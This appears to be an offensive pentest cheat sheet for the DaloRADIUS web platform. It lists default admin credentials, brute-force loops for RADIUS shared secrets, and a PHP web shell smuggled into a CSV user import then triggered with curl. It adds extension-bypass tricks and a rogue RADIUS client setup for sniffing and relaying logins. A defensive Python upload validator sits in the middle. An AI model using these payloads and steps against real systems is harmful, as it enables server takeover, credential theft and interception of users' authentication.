DaloRADIUS
RADIUS web platform aimed at managing Hotspots and general-purpose ISP deployments
Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service.
Port: UDP/1812 (authentication), UDP/1813 (accounting)
Default Credentials: Often uses a shared secret between the client and server.
Enumeration
Login Pages → /app/users/login.php and /app/operators/login.php
Default credentials → administrator:radius
Brute-forcing RADIUS shared secret
Nmap radius-brute script
```bash
nmap -sU -p 1812 --script radius-brute <target>
nmap -sU -p 1812 --script radius-brute --script-args radius-brute.creds=secrets.txt <TARGET_IP>
```
radclient
```bash
# Try each candidate secret from secrets.txt; stop at the first Access-Accept
for secret in $(cat secrets.txt); do
  echo "User-Name=test" | radclient -x <TARGET_IP> auth "$secret" 2>&1 \
    | grep -q "Received Access-Accept" && echo "[+] Valid Secret Found: $secret" && break
done
```
Send a single request with a known shared secret:
```bash
echo "User-Name=test" | radclient -x <IP> auth <shared_secret>
```
RCE via File Upload
1. Log in to the admin panel.
2. Navigate to: Config → Import Users
3. Craft a malicious CSV:
```csv
username,password
<?php system($_GET['cmd']); ?>,p4ss
```
4. Upload the file. Uploaded path:
```
http://<target>/daloradius/library/shell.php.csv
```
5. Trigger RCE:
```bash
curl "http://<target>/daloradius/library/shell.php.csv?cmd=id"
```
If PHP Doesn't Execute
- Try double extensions → shell.php%00.csv
- Try the .htaccess bypass if the server is running Apache.
- Check for local file inclusion vulnerabilities to include the uploaded file.
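The import path above accepts a crafted file name and a PHP tag inside a CSV cell. As an added example (not DaloRADIUS code), this Python validator shows the checks a hardened import handler would apply before anything is written: a bare single-extension .csv name with no null bytes, a strict username,password header, no script tags in any cell, a plausible User-Name charset, and storage under a server-chosen random name in a directory outside the web root. The policy values (username charset, password length bounds, quarantine directory) are assumptions.

```python
from __future__ import annotations
import csv
import io
import re
import secrets
from pathlib import Path

# Constructed policy values (assumptions, not DaloRADIUS defaults)
SAFE_USER = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")      # accepted User-Name charset
SCRIPT_TAG = re.compile(r"<\?|<script", re.IGNORECASE)  # would execute if ever served
REQUIRED_COLUMNS = ("username", "password")

class ImportRejected(ValueError):
    """Carries the reason so the operator can log the rejected upload."""

def validate_filename(name: str) -> str:
    """Allow only a bare <name>.csv: no paths, no null bytes, no double extensions."""
    if "\x00" in name or "%00" in name.lower():
        raise ImportRejected("null byte in filename")
    if Path(name).name != name or name.count(".") != 1 or not name.lower().endswith(".csv"):
        raise ImportRejected("filename must be a bare <name>.csv")
    return name

def validate_rows(raw: bytes) -> list[dict]:
    """Parse the CSV and reject any cell that is not a plausible credential."""
    try:
        reader = csv.DictReader(io.StringIO(raw.decode("utf-8")))
    except UnicodeDecodeError as exc:
        raise ImportRejected("file is not UTF-8 text") from exc
    if tuple(reader.fieldnames or ()) != REQUIRED_COLUMNS:
        raise ImportRejected("header must be exactly username,password")
    rows = []
    for lineno, row in enumerate(reader, start=2):
        user, pw = row.get("username") or "", row.get("password") or ""
        if SCRIPT_TAG.search(user) or SCRIPT_TAG.search(pw):
            raise ImportRejected(f"line {lineno}: script tag in credential field")
        if not SAFE_USER.fullmatch(user):
            raise ImportRejected(f"line {lineno}: invalid username {user!r}")
        if not 8 <= len(pw) <= 128:
            raise ImportRejected(f"line {lineno}: password length out of range")
        rows.append({"username": user, "password": pw})
    return rows

def accept_import(name: str, raw: bytes, quarantine_dir: Path) -> tuple[Path, list[dict]]:
    """Validate, then store under a random server-chosen name outside the web root."""
    validate_filename(name)
    rows = validate_rows(raw)
    dest = Path(quarantine_dir) / f"import-{secrets.token_hex(8)}.csv"  # never the client's name
    dest.write_bytes(raw)
    return dest, rows
```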
Modify RADIUS clients to intercept authentication requests
Navigate to Management → RADIUS Clients → Add Client
Enter attacker-controlled server as a client:
```
Client IP/Hostname: <YOUR_ATTACKER_IP>
Secret: hacking123   # Shared secret for interception
```
On your attacker machine run:
```bash
# Use radsniff (from FreeRADIUS) to capture requests
radsniff -i eth0 -s hacking123 udp port 1812
```
Relay or Modify Requests (MitM)
```bash
echo "User-Name=victim" | radclient -x <REAL_RADIUS_IP> auth hacking123
```